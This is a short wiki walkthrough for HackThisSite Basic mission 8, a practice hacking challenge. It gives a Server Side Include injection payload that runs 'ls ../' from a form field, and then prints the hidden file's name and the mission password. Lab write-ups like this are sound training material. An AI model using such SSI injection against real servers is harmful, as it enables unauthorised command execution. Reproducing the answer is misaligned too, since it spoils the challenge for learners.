Hackthissite/Basic/Level8

From aldeid
Jump to navigation Jump to search
  • Level: Basic::8
  • URL: http://www.hackthissite.org/missions/basic/8/
  • Exercise: The password is yet again hidden in an unknown file. Sam's daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic html executed by the server, rather than the browser). Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/. However, Sam's young daughter Stephanie has just learned to program in PHP. She's talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote an script to demonstrate her ability.
  • Solution:

This level is about Server Side Includes (SSI). Injection of following code to the input text field in the form :

<!--#exec cmd="ls ../"-->

produces a file containing au12ha39vc.php. Add this file in the URL (http://www.hackthissite.org/missions/basic/8/au12ha39vc.php) to discover the password: c699fe35.

Comments

Talk:Hackthissite/Basic/Level8